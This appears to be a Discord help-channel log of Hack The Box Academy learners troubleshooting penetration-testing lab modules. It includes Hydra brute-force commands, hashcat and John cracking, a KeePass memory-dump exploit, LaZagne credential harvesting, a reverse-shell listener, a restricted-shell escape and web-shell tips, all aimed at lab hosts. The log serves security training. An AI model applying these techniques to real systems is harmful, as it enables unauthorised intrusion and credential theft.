have you solved?

the normal password list and the mutated one

[STATUS] 411.00 tries/min, 411 tries in 00:01h, 9780200 to do in 396:37h, 29 active

looooooooooooool

$ hydra -L username.list -P mut_password.list -t 64 ftp://10.129.13.48
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-13 15:48:13
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 9780576 login tries (l:104/p:94044), ~152822 tries per task
[DATA] attacking ftp://10.129.13.48:21/
[STATUS] 411.00 tries/min, 411 tries in 00:01h, 9780200 to do in 396:37h, 29 active
[STATUS] 457.67 tries/min, 1373 tries in 00:03h, 9779238 to do in 356:08h, 29 active

this gets it there but it is encoded and doesnt execute on the victim server

Just to make sure, you aren’t trying to run a .exe on a linux system are you?

Maaaaybe

yes lol

tried to make it into a .py

Yea exe is for windows, lazagne should have a python version too I think?

any help guys

yes I gotta find it

my brain is fried. this is what i get when i do python3 laZagne.py all on the host

Traceback (most recent call last):
File "laZagne.py", line 17, in <module>
from lazagne.config.write_output import write_in_file, StandardOutput
ModuleNotFoundError: No module named 'lazagne'

yeah im stuck on this machine

Password Attacks Lab - Easy
Our client Inlanefreight contracted us to assess individual hosts in their network, focusing on access control. The company recently implemented security controls related to authorization that they would like us to test. There are three hosts in scope for this assessment. The first host is used for administering and managing other servers within their environment.

anyone worked on this

i need some help

i'll dm you to avoid spoilers.

you need to allow server members to message you

oki

give me a seconds

Hi everyone could anyone give me exaples of their notes for modules and boxes in Academy. I'm strugling with making one that will be usefull for future
Thanks for help 🙂

is allowed brother on my settings

Your message could not be delivered. This is usually because you don't share a server with the recipient or the recipient is only accepting direct messages from friends.

i tried to sent you a message

and the same rror

I actually block people from messaging me because it's been abused in the past lol

let me turn it on real quick

try now

everyone's notes are going to be different.. you also shoudn't base your notes off of what other people are doing. take your time and figure out what works for you

done

Your message could not be delivered. This is usually because you don't share a server with the recipient or the recipient is only accepting direct messages from friends. You can see the full list of reasons here:

lool

again

send me a freind request

well now I am stuck on the Passwd, Shadow & Opasswd module. cant cat anything without root and I dont see any hints on how to get the shadow file

There is a directory that the user has that has the files

ah

I way overthought tha

Im doing the easy password cracking lab right now, I'm running hydra against the ftp server with just the username and the password list given in the resources, and the password file is not mutated, hydra is saying it is going to take an hour, I have -f set so it could take less, but is that normal?

Hi, this explanation from XSS I dont understand why the first is suspicious and the second one isnt

https://academy.hackthebox.com/module/51/section/1592 - saw someone put this ||grep -rnw "/" -e "HTB"|| ngl, had to man page and explainshell that command. I used ||grep -r "/" "HTB"|| but the first command works better.

What are things that you have done till now on this question?

Add the flag -t 64

ok ill keep that in mind, I ended up getting it after 50min lmfao

And its took me 2h

yeah

only 50 min for you you so lucky 😂😂

i guess so

If you find something can you share it with me

anyone

#rules

hello everyone one i am new here

and also new to hacking, i have been researching a bit but its too much info and idk where to start, i have a little bit of prior programming expierence in javascrpt but i am very amature i was hoping you can guide me

htb academy, notes, time, repetition

ohh ok

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

just start by doing my guy. HTB as academy and their older machines with walkthroughs and youtube videos. Highly recommend you start with something like https://obsidian.md so you can jot down notes and lessons as you go as well.

┌──(shadowalker㉿kali)-[~/Downloads]
└─$ hydra -L username.list -P password.list -t 64 smb://10.129.202.221
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-14 00:05:36
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 21112 login tries (l:104/p:203), ~21112 tries per task
[DATA] attacking smb://10.129.202.221:445/
[ERROR] target smb://10.129.202.221:445/ does not support SMBv1

guys can i change the version of smb on hydra

cuz i know that the service is runing an smbv2

ig notion is way better for beginner

hydra -L username.list -P password.list -t 64 10.129.202.221 smb2

thx broo ur the best

👍

Hydra does not natively support SMBv2 or SMBv3 for brute-forcing. The smb module in Hydra typically attempts to use SMBv1,

XD iil use crackmapexec

guys any idea

how can i decrypte this file file Documentation.docx
Documentation.docx: CDFV2 Encrypted

just hints no spoil

never mind i can jhon to get the password to dycrypte it

Can I help me please? Private?

read #welcome and #rules after that use /verify at #bot-commands and ask that at at #boxes

okay thanks you excuse le

I make a post in the community help ^^

why? if you are having issue with HTB main platform box's ask it in #boxes

I don't have access in aucun accès

Read and follow #welcome

Hi need a small help "Unconstrained Delegation - Computers"

Facing issue on this

hello i make the Nginx Reverse Proxy & AJP
i have comment the ngnix.conf but i have this ( invalid port in upstream)

is it just me or is the academy site down? 500 Server is not feeling well

yes

it down...

aaand its back

It's working

Now it's Down

yeah down

same

also is this a good area to ask about why i cant do from "pwn import xor" on the downloaded parrot htb distro? it says ModuleNotFoundError: No module named 'elftools.common.py3compat'

https://tenor.com/view/minecraft-server-restarting-server-restart-minecraft-server-restarting-gif-25036664

https://tenor.com/view/office-server-power-lady-unplug-gif-8220789

https://tenor.com/view/loading-discord-loading-discord-boxes-squares-gif-16187521

is htbacademy down?

Apple does the same. When they launch new products, the store is taken offline....

it gives 502 error

maybe add module

i get "bad gateway".. not sure what's so bad about it, it seems to be working fine.. the host behind the gateway, now that's a different story

So far they have done it without interruption 😉

Guys Try HEAD Method Lol

adding new exam buying option (CDSA)

ah ok

or maybe someone pwned and got the flag...

i hope so .....

what is it cdsa

is the point of the academy.hackthebox to hack it and get the flag? and here we were just doing the cources

Cert for the SCO Analyst Path

ah ok

https://tenor.com/view/error-gif-19911538

Eskalation

ok?

AcademyTwo

Read Chat

tldr

i luckly still have the page up for what section im working on but cant do anything cause it says to Create the XOR ciphertext of the password 'opens3same' using the key 'academy'. (Answer format: \x00\x00\x00....) the parrot htb distro says it doesnt have 'elftools.common.py3compat'

I think you can do it manually with python

what module are you doing

take the opportunity and try finding three other ways of doing xor 👍

pip install pyelftools

Cracking Passwords with Hashcat Hashing vs. Encryption, there are other ways

Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: pyelftools in ./.local/lib/python3.9/site-packages (0.30)
DEPRECATION: gpg 1.14.0-unknown has a non-standard version number. pip 23.3 will enforce this behaviour change. A possible replacement is to upgrade to a newer version of gpg or contact the author to suggest that they release a version with a conforming version number. Discussion can be found at https://github.com/pypa/pip/issues/12063
DEPRECATION: wfuzz 3.1.0 has a non-standard dependency specifier pyparsing>=2.4*. pip 23.3 will enforce this behaviour change. A possible replacement is to upgrade to a newer version of wfuzz or contact the author to suggest that they release a version with a conforming dependency specifiers. Discussion can be found at https://github.com/pypa/pip/issues/12063

https://xor.pw/

cool Fixed now

https://www.dcode.fr/xor-cipher

Maybe run the script with Python3.9 but dont know any further

its telling that its installed

its back

hello i make the Nginx Reverse Proxy & AJP
i have comment the ngnix.conf but i have this ( invalid port in upstream)

want me to paste the entire output?

And gone

yea woop

Y

$python3.9
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.

from pwn import xor
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/galareed/.local/lib/python3.9/site-packages/pwn/init.py", line 4, in <module>
from pwn.toplevel import *
File "/home/galareed/.local/lib/python3.9/site-packages/pwn/toplevel.py", line 23, in <module>
from pwnlib import *
File "/home/galareed/.local/lib/python3.9/site-packages/pwnlib/dynelf.py", line 57, in <module>
from pwnlib import elf
File "/home/galareed/.local/lib/python3.9/site-packages/pwnlib/elf/init.py", line 9, in <module>
from pwnlib.elf.corefile import Core
File "/home/galareed/.local/lib/python3.9/site-packages/pwnlib/elf/corefile.py", line 79, in <module>
from elftools.common.py3compat import bytes2str
ModuleNotFoundError: No module named 'elftools.common.py3compat'

dont use pwntools?

maybe pip install elftools

there are infinite ways to make a XOR cipher

pip3.9 install --force-reinstall pyelftools
pip3.9 install --force-reinstall pwntools

was following the module and got stuck there.

If its still not workiong after that I would suggest using the Methods that RafaJurado metioned 👍

https://tenor.com/view/serverdown-auroradown-gif-22807531

Now it works for me

Down, down, down...

pwnbox has its limitations

not for me

yeah... its just erroring saying i dont have the updated dependencies, but when i try installing the dependencies they say that they are fully updated... catch 22. ima just use that website

yeah im getting 502

same for me

heck for ban 😄

same for me

Haha I refreshed several times

same for me 502 now

its up now ig

pretty slow tho

How do I contact support?

They will need to remove my IP from block list

its up bud

they didnt ban u dw, it was down for everyone for a min

the block is probably temporary

Yeh but I don't want to wait

I refershed several times in a row

still 504 here

If the work takes a long time, will we get extra time to take the exam?
because i have ~30h to complete CBBH and Report

+1

now up but slow

Up!

it's going up and down

https://tenor.com/view/rollercoaster-wild-ride-old-people-boomers-gif-21711329

someone actually have beed doing their modules

down now

so who is hacking the box anyway? also i found a website to do it, i hope i wont need elftools

Finally my IP got removed from backlist

Its actually up now

u can downgrade pyelftools to a working version:

pip uninstall pyelftools -y
pip install pyelftools==0.29

import should work after

i think...

Thanks so much, that worked 😄

no one has the ideas to solve it? 🤨

where are you having problems?

i couldn't figure out the answer for the GET section of Web Requests module.

hello y'all, is this error meaning the xp_cmdshell is not enabled in the MSSQL Srv :
The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'...???

go through the module again

Thank You. i did it.

Hello.

So I am not the only one facing issues

Good to know that

Decided to do something to take my mind off of it, so why not learn something new?

I was learning Turkish

That is harder than CPTS

Ah, Turkish reminds me of something.

Kebab ?

anyone know how to solve this error with hashcat? clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

error: unknown target CPU 'generic'

• Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.
  ps
  Device #1: pthread-AMD Ryzen 9 5950X 16-Core Processor

My best friend, not anymore.

I can understand you, I can really understand

A fight ruined everything, ruined my life too, that was the last straw.

I am sorry that it ended up like that I hope you have moved forward from that point and meet awesome people .

That happened yesterday my friend.

I got some drinks and balcony if you are around come and share the story

Where brother?

||Pakistan||

I’m your neighboring country then.

||Afghanistan ||

Daaamn

Hopefully

Things will get better for you

I hope so, do you know how to code with python?

Depend on what we are coding but I can f around and figure out

Beginner things, just started.

This isn't a general channel. Please verify your account following #welcome to be able to access more channels

"Automate the boring stuff" is a good pickup btw (free online)

exactly I was gonna suggest that

I don’t quite know where to find my account identifier

https://academy.hackthebox.com/module/51/section/1845 - is not accepting the flag

It's on the main site app.hackthebox.com

That doesn't look like a full flag

what? hmmm

even with HTB{ it doesn't work

I blurred out the rest. Is that what you mean?

No

It looks like it's cut off

strange

You probably changed the window size following the section

I ran this bash loop to get it ||while read line; do echo $line; done < /opt/flag.txt; echo $line||

restricted shell -

like i said it looks cut off ¯_(ツ)_/¯

Doesn't it look odd to you?

yes missing HTB

and a typo

hmm, i'll keep working the issue

are you sure it's even meant to be in brackets? ¯_(ツ)_/¯

hello i make the Nginx Reverse Proxy & AJP
i have comment the ngnix.conf but i have this

just ||cat /opt/flag.txt|| should work 👍

Logrotate section in Linux priv escalation

How many minutes I have to wait until I get connection on my machine. Like am waiting for 5 minutes no response

anyone know how to solve this error with hashcat?
clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

error: unknown target CPU 'generic'

Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.
ps
Device #1: pthread-AMD Ryzen 9 5950X 16-Core Processor

it doesn't

that's the first thing I tried

||ssh htb-user@$ip -t "bash --noprofile"|| | forgot to escape the shell, then cat the file. You were right it was cut off.

Hello am new here

welcome brother

hello guys

im on the hard lab

password attacks

i found a keepass on the machine version 2.50

which is KeePass 2.X Master Password Dumper (CVE-2023-32784)

i tried to run the xploit and im getting this error

┌──(shadowalker㉿kali)-[~/hardlab/keepass-password-dumper]
└─$ dotnet run ~/hardlab/KeePass.DMP

Welcome to .NET 6.0!

SDK Version: 6.0.400

Installed an ASP.NET Core HTTPS development certificate.
To trust the certificate run 'dotnet dev-certs https --trust' (Windows and macOS only).
Learn about HTTPS: https://aka.ms/dotnet-https

Write your first app: https://aka.ms/dotnet-hello-world
Find out what's new: https://aka.ms/dotnet-whats-new
Explore documentation: https://aka.ms/dotnet-docs
Report issues and find source on GitHub: https://github.com/dotnet/core
Use 'dotnet --help' to see available commands or visit: https://aka.ms/dotnet-cli

/usr/share/dotnet/sdk/6.0.400/Sdks/Microsoft.NET.Sdk/targets/Microsoft.NET.TargetFrameworkInference.targets(144,5): error NETSDK1045: The current .NET SDK does not support targeting .NET 7.0. Either target .NET 6.0 or lower, or use a version of the .NET SDK that supports .NET 7.0. [/home/shadowalker/hardlab/keepass-password-dumper/keepass_password_dumper.csproj]

The build failed. Fix the build errors and run again.

Look again in the module how to attack something like this.
||John|| is always a good friend

anyone else having trouble connecting to academy network? I've switched and reloaded my vpn multiple times and cannot connect

Currently trying to bruteforce ftp/ssh in the password mutation section for password cracking module. Ive made a list of around 8k based on other tips ive found online but it still seems to not be working

nvr mind

i got it

Hi guy, i have a question regarding AD Skill Asssessment II. I already completed it but just confused as to why the ms01 machine can get more ntmlv2 user hashes than the kali attack machine via LLMNR posioning even though both are on the same subnet.

hi @everyone

this is a driver issue, what are you running it on and which runtime?

I'm guessing POCL based on the error

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] yes, ive been trying to switch to amd rocm but either im messing it up or it doesnt help me

yeah that's pocl

so the actual "issue" is that pocl doesn't support your CPU

at least, not specifically, hence the "generic" target

AMD ROCm will Also probably not work here

since it's a GPU specific runtime

you will need to replace pocl with Intel's CPU runtime (counter intuitive, i know, but AMD doesn't have their own)

yeah i saw that online, but i dont know which one, the intel-opencl-icd?

I trued to exploit that and i got 2 master keys but none of theme work

Ig ill try the john like you said

installation package. Check the release notes to ensure supported targets include your target device. 
Linux* OS 

Please take one of the following methods to install the Intel CPU Runtime for OpenCL™ Applications. 

    Download Intel® oneAPI Base Toolkit to install the latest OpenCL™ CPU runtime.
    Visit  Intel® CPU Runtime for OpenCL™ Applications with SYCL support to download and install the latest OpenCL™ CPU runtime for Linux*. 
    Github: https://github.com/intel/llvm/releases
        Search for "oneAPI DPC++ Compiler dependencies" and find latest release to download, e.g. https://github.com/intel/llvm/releases/tag/2020-WW20
        Follow the installation instructions to install.

under the Intel® Xeon® Processor OR Intel® Core™ Processor (CPU) Runtimes section here: https://www.intel.com/content/www/us/en/developer/articles/tool/opencl-drivers.html

so after i get that, how would i switch to it? i don't see too much info on it.

Hello, I'm in password attacks --> password mutations. I have mutated the wordlist with the ||custom.rule|| and I grepped by ||b's|| but i don't get anything. Any hint please?

I'm brute forcing ftp, that is faster to brute than ssh i suppose

…

Check this helped me a lot

After installing it, it still wants to use POCL, how would i switch it to use intel instead?

can you uninstall pocl?

you may need to install the icd loader

I did yes, and now it says there is none.

yeah, you'll probably want to install the icd package

the one you had identified before

intel-opencl-icd is already the newest version (22.39.24347).

clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR

ATTENTION! No OpenCL-compatible or CUDA-compatible platform found.

You are probably missing the OpenCL or CUDA runtime installation.

Yeah, this is the problem with these runtimes lol

registration can be a huge pain in the ass

trying to figure out how to make it see it >.>

whats up guys, new here. i need some help

i was trying to change my email to my student email and i accidentally typed it in wrong. so now it wants me to log into a non existant email and verify it...

anyway i can change the email without having to verify it?

This is a question for support. We won't be able to help you.

Hello, I have the question is there any order I should do modules in Penetration Tester Path ? I did Attacking common Services and now it directs me to PIVOTING, TUNNELING, AND PORT FORWARDING ?

The order listed in the path is the order that you should complete them in, to ensure that you have all the skills necessary. Some modules will expect you to have done other modules.

how can i contact support and get a rather quick response?

contact us via the green chat bubble bottom right. make sure to disable adblocker

hey Guys I'm in "Password Attacks Lab - Hard"
I can't get the mount file ...
I try this website : https://itsfoss.com/mount-encrypted-windows-partition-linux/

but when I do it it gives me :
"Thu Sep 14 20:00:58 2023 [CRITICAL] Cannot parse volume header. Abort."

any1 can help me please it driving me crazy

I used the procedure outlined by the user Arrano in here.

This one

I just finished Attacking Common Services - Medium but if I'm honest, it was only the fact that I read in here that ||my nmap wasn't broad enough || that gave me the necessary info. So I thought I'd ask those who managed to figure it out by themselves, are you ||scanning all ports each time you do an nmap rather than just top 1000|| or was there something in the standard nmap that gave you the clue?

I just finished this module...What do you need help with?

any help guys

find a diff way to auth

this goupmemebre ship can help me to add david to the rdp users

never mind

guys anyone now how can i mount thsi file Backup.vhd i was trying to do so but i was getting errors after errors

#modules message

thank U !!!!

how can i know that the file is protected with bitlocker

cuz i dont have anu info about how bit locker work or how do i know that the file is protected with bit locker

hey guys I'm in the Docs and reporting module and I'm trying to understand why my answer is wrong. Am I inputting the answer wrong?

Yeah, i almost had to brute force this too... the format is [key] + [key] + [key] + [key] if that helps. I used all caps as well.

so theres another input I need to have thanks

no dice

your last character is a bit off

are they going off of the ippsec settings because the first sheet has that as how to do vertical splits

idk I may just come bact to it later because I'm still not seeing the correct answer. I've tired both the tmux cheat sheet and the ippsec cheat sheet and neither have worked.

help guys 😦

bit locker requires pro version of windows in order to be used

i found that back up

treid to mount it

it wont

do you have it enabled?

how can i know that is enctypted with bitlocker

he mean the section lol

sorry for the delay

its oki

did you crack the pass first?

no i didnt

i got the file

tried to mount it

too many errors

how can i know its protected witha password and its uding for encryption bitlocker

if you can't on linux you can always do it on windows but you need to extract and crack the hash first

to avoid spoil

can i dm you

sure

No it doesn't

Unless you're referring to encrypting your own drive

If you look in the module it says to use % for vertical and " for horizontal

Yea I was talking about personal drives

They supplied two different things the#n because my earlier screen shot shows very with “ not
%

Do single quote

no it doesnt

I’ll try when I get home

Yes for personal drives it does

I think you still can with cmd line. But the major point was that, by saying that you could have thrown someone way off from how they were going to do the module.

Was given half info when i replied to the message. Originally

manage-bde goes brrrrr

Nah I scrolled up, plenty of context was given

Are you referring to using it on your own system or a target? And from when I replied because all I said was it required pro/enterprise to use. I didn’t know what it was being used on until after my statement.

I mean I scrolled up from where you replied to the user

Before answering questions try gathering context (scrolling up usually).

Heard, staying quiet is more my speed so I’ll just leave the question answering to others then.

This may be completely irrelevant for now but if anyone in future needs: if anyone is using ZAP for fuzzing and needs an ASCII encoder processor, install the community scripts add-on from the zap marketplace, then enable to-hex.js script under the Payload Processor in the scripts pane on the left. You should be able to select scripts in the processor pane and see to-hex.js when fuzzing

hi I'm on hard lab pwd attacks and have been trying to mount the vhd using qemu-nbd and bitlockermount but is not working. Have been checking the history in the channel and the forums but can't understand what is the problem

with dislocker it prompts the Cannot parse volume header. Abort.
and with cryptsetup bitlkOpen it shows not a valid BITLK device even if I had no problems when using the qemu-nbd command and the Backup file

I've used a quick Windows virtual machine if that can help

can I dm you?

sure no problem

yes it will help

Hi everyone. After taking a break I continued with the CPTS and lo and behold, my old arch nemesis: fuzzing. I'm currently stuck in https://academy.hackthebox.com/module/54/section/511 on question 3. Can someone give me some pointers / hints about which wordlist(s) I need to use or should consider... Many thanks

Hello everyone im doing the module Linux privilege escalation, im in part logrotation, im tring to find the configuration file (/etc/logrotate.conf) but doesnt appear, could somebody give me a hint please?

the "logrotate.conf" file isn't present

im tring to execute logrotate but my nc is like this

listening on [any] 3333 ...

but never gets a connection

you can use ||directory-list-2.3-small.txt||

taking into account that you're making the right steps it could be that the payload isn't triggered, there are better ways to achieve the end-goal rather than getting a reverse shell up to you anyway

i understend i try somethink

how can know if the payload is trigget or what i need to do to trigger it?

on how to trigger it you have to find it out, to see if it is being triggered you could ping yourself while listening with tcpdump

i understend

thank u!

this is what I would do, probably there are better ways to confirm that is working the way it should

hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]

• Device #1: cpu-sandybridge-AMD Ryzen 5 5600H with Radeon Graphics, 2819/5702 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 4
Maximum password length supported by kernel: 256

Counted lines in /home/shadowalker/Downloads/mut_password.listInsufficient memory available
zsh: segmentation fault hashcat -m 22100 /home/shadowalker/Downloads/mut_password.list backup.hash

im facing this probleme any help guys

i tried to rstart my pc update it but still

hey friends, in Attacking Common Applications Attacking Applications Connecting to Services how to solve this

did you put straight away the break-point? Before doing that just execute the run command

Thank you, then I'm at least on the right track

I see this sometimes when I accidentally swap the "wordlist" and the "hash" but it could be that you have not enough RAM available but I don't think this is the case. Anyway make sure to follow the right command syntax hashcat -m <mode> <hash> <wordlist>

thank you , i did it right now 👍 😊

hey did you figure this one out? i've found the set values but none of them are accepted. thanks!

Hey Do U remeber how U did it ?

I'm stuck at that "Pass the Ticket (PtT) from Linux" Q: "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). "

and I don't get it

If someone have a hint 4 me please ...

I can't recall tbh, which module is it ?

I have, let me check

"Password Attacks" ==>> "Pass the Ticket (PtT) from Linux" ==>> Question :
Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

i have to run to the store, but if no one helps you by the time i get back i'll dm you

Dm me what you’ve tried

I went through my notes and I haven't added anything other than what is already in the module so I'm not sure what did I do more/different to get

For me it was a matter of formatting it, still not sure why it didn’t work for me

ok, I'll go through it again
thanx

Sorry for my fish memory

😆 np

@fiery berry got it now, but it was a different wordlist

OMG, that was such a BS

I am currently working through the attacking enterprise networks module and am on Internal Info gathering, I am finding when transfering nmap to the target and applying correct chmod that it is failing to launch with errors such as unable to find namp service reverting to /etc/hosts, I am also finding that running enum4linux through proxychains is telling me to install smbclient which I have

need to work out if I have a bug or missing something

thanx, I just found it
wasn't what I thought (I made it 2 complicated then it is )

what was it ? so I can add it to my note

btw the whole module is tough you just need to be patient and focused

nmblookup is not in your path etc, I am working from my kali bare metal via VPN connection to lab, proxychains nmap

just enumeration in the|| smbclient //dc01/c$ ==>> SharedFolder ==>> linux01 ||

since I'm root already (got the needed credentials) ...

yes this was my last 1
the last lab =OMFG

it's better to use something like ligolo-ng for pivoting and if you are using proxychains at least use proxychains4 and for tools like enum4linux it's old af if you want to some semi auto smb enum try enum4linux-ng

also for nmap if you have a pivoting, moving the nmap binary on to the target just to do some scanning is one of the worst thing that you can do

I would tend to agree however I was following the instructions in the module

I moved the nmap binary and it will run but as soon as I give it --open -iL live_hosts I get the errors above relating to failure to find nmap services

it's recommended that you do this section blind

ahhh ok

so do it as I would normally?

let take this troubleshoot to DM ifyou want

sure thing

I don’t know if you solved this, but there’s another way to do this than suggested on the module, which is the way that I got it to work. Instead of creating a rev shell, perhaps you could create something else/someone else…

Hi guys, I am currently doing the medium lab for attacking common services and I am unable to bruteforce FTP, every time I try I get this error: target was disabled because of too many errors

Does anyone know how to circumvent this?

easy*

Can I DM someone about the File Upload Attack Skill Assessment?

I can dm you, if you still need help

that would be awesome 😄

Anyone working on the NTLM relay skills assessment question #3 that can help me understand something about the question?

feel free to dm

I am working on the final question for the hacking word press assessment. I have the an admin password and can get to the admin page. i can not seem to edit the theme. i get an error even if i do not update the 404.php page but hit the update file button. it says: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.... Am i missing some setup that I need to enable to let it communicate back with the site

did you use something like the Twenty Seventeen theme?

nope i used 19

give that theme a try

from what internet says the error would appear to be that wordpress seems to be doing some code check to make sure there are no typos and in that check process it is not getting a proper response back... i am trying to use metasploit (msfconsole and wp_admin_shell_upload) to get a real reverse shell but having issues with that too. the metasploit thing is most likely me ... me and metasploit do NOT seem to like each other much.

not sure what you found out about that error code but the issue are probably in the theme that you used so try the one i suggested

that works; Thanks

yeah, the trick is slow the F down you don't need to jump straight away to a different method first thing after your previous try doesn't work

not really clear on why i cant do it with 19 still not sure what the error means

also not sure how to use the cmd through the url properly ... i ended up just editing the php file repeatedly ... sometimes %20 worked other times it did not and i could not find any information on what encoding i should be using or how to figure out what was messing with the encoding. so just edited the php directly with stuff like system('cat ../foo/bar/baz.txt')

here is some more info on https://www.hackingarticles.in/wordpress-reverse-shell/ and here is the payload that i recommended https://github.com/Arrexel/phpbash

all HTB target machine doesn't have internet so if anything involved it doesn't work so my guess from what you found the error was is that theme needed internet to check or do something

the moral of the story is if a theme doesn't work try a different one 🤣

thanks i will look those over

In the "Password Spraying - Making a Target User List" section of Active Directory Enumeration & Attack Module, there is sentence mentioning "flast" format.

Let's try out this method using the jsmith.txt wordlist of 48,705 possible common usernames in the format flast

Anyone know what this is in reference to? I can't seem to find any information on it.

First letter of firstname and full lastname

f(irstname)last(name)

aahh, I'm silly. Thanks!

Where do start from please am a novice here

read #rules and #welcome

Shells & Payloads - Laudanum question 2: it wants the path given in the section above. Nevermind that its also present under /opt and one of the path components in the answer is a symlink (so it won't show up with find by default)

I am currently on the footprinting module, on the MSSQL section. I cannot run mssqlclient.py, it says it doesnt exist. is there a certain directory i need to be in? or am i approaching this the wrong way? DMs welcome

impacket-mssqlclient (I'm assuming you're on kali linux)

└─$ smbclient -U david \\10.129.7.126\david
Password for [WORKGROUP\david]:
Try "help" to get a list of possible commands.
smb: > get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT im getting this error since the morning

run locate mssqlclient.py to see what file path yours is in. Mine is in impacket/build/scripts-3.11/ yours might be somewhat different.

hello y'all I'm doing the Pivoting, Tunneling, and Port Forwarding Module | Remote/Reverse Port Forwarding with SSH section, I'm trying to replicate the scenario described in the section but, I'm not sure how to connect with the Windows Machine to download the payload from the Pivot

I tried with the Dynamic port forwarding explained previously with no success

anyone who has made it and is willing to explain me..!!!

or point me to the paragraph/section where is mentioned in the content..!!!!

everything is explained in the module, I'm not sure where you're struggling

if you want to download something from the "jump host" start a "python simple server" (sure there are other ways to accomplish it) and from the Windows machine in the internal net you have just to download it as per example shown

ok., how do you download something from the Windows machine if you don't get access to it?

I mean, this command PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" need to be run from the windows machine or downloaded from a web browser from the machine as well

I'm struggling with the fact I'm not seeing how to connect to Windows machine to download or run the PS command..!!!

cause you need to find valid credentials to connect to that machine or you exploit a listening service

answer the questions and go ahead there will be the time to do what you want to do so you can replicate the steps. I guess you can even do it if you want right now, but I don't remember honestly

help guys

i acnnot get the file backuup.vhd
to mu machine its was corrupted thats why i was facing
errors
smbclient -U david \10.129.7.126\david
Password for [WORKGROUP\david]:
Try "help" to get a list of possible commands.
smb: > get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT im getting this error since the morning

searching in the forum the issue is VPN route or something related

thios a probleme with lab

its not mu network or something

hi guys

i was trying to do one machine of starting point of hackthebox

it says
Spawn the target machine and the IP will show here

but when in start the pwnbox (which has 2 hour limit)

i m trying like 2 days

it still not shows the ip there

but the same probleme over and over

i do not understand why is this problem, i used to think hackthebox is best site to do boxes, but this basic problem whyyyyyyyyyyy

@sterile hawk

Read #welcome and follow instructions to verify. You'll have access to #starting-point

okay, just did that

now what

#starting-point is where you wanna ask questions relating to it

smbclient //IP/david -c 'get Backup.vhd' -U david

same probleme

└─$ smbclient //10.129.58.92/david -c 'get Backup.vhd' -U david
Password for [WORKGROUP\david]:
parallel_read returned NT_STATUS_IO_TIMEOUT

Have you tried the other file transfer approaches?

Maybe the smb route is blocked

i want to learn to make a cheat for a game

Look at htb academy there's a couple modules related to crafting cheats

try with \\\\<IP>\\<sharename>. Anyway speaking for my self I got the "Backup.vhd" not from the SMB share

Does your password for david starts from gXXXXXXXXXXX?

Yes

PIVOTING, TUNNELING, AND PORT FORWARDING: RDP and SOCKS Tunneling with SocksOverRDP
Question:
Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop.

Downloaded the SocksOverRDP-Server.exe, SocksOverRDP-Plugin.dll, ProxifierSetup.exe and transferred to the RDP session.
Turned OFF Defender
Then trying to run 'regsvr32.exe SocksOverRDP-Plugin.dll' as per module and getting this error

What I am doing wrong?

dm me

smbclient -L IP-U johanna%johanna's_password

with this do you get to see david share?

Real-time protection still runninh

working on the attacking common applications, attacking tomcat section. when i access the url web01.inlanefreight:8888/manager i get asked for the username and password, when i access the web01.inlanefreight:8888/manager/html/ i get a page providing some info. BUT when we try to brute force the login page in metasploit, tomcat_mgr_login module the TARGETURI page is set as /manager/html. why is this set to /manager/html and not /manager/ , i did set it to /manager/ and ran the explout but it didnt run. the exploit runs succesfully only if TARGETURI is /manager/html. any ideas why?

Take a close look at the exploit.
Probably Tomcat is only vulnerable on /manager/html in this case.

we are asked to brute force the login page, so shouldn't we put in /manager as the TARGETURI, this is the exploit , auxiliary/scanner/http/tomcat_mgr_login

Take a close look at the exploit.
What exactly does it attack and how?
Then take a close look at the login process in Burpsuite and try to understand when and where which data is sent and processed.

the module also shows us other exploits which can achieve the same brute force functionality, in those exploits the uri is set as /manager

k will do, thanks

ah ok i got it, it redirects to /manager/html. thanks , now i got it!!

can someone nudge me on Documentation & Reporting Practice Lab?

i got some more users' hash from using a tool.

managed to crack some of it.

but not able to login to the DC01

